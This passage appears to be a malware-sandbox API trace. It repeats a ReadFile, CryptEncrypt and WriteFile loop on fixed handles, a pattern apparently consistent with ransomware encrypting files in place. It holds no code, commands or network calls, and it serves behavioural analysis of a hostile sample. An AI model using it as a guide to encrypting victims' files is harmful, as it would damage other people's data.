WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.030] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.030] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.031] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.031] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.032] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.032] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.033] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.033] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.034] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.034] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.035] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.035] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.036] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, 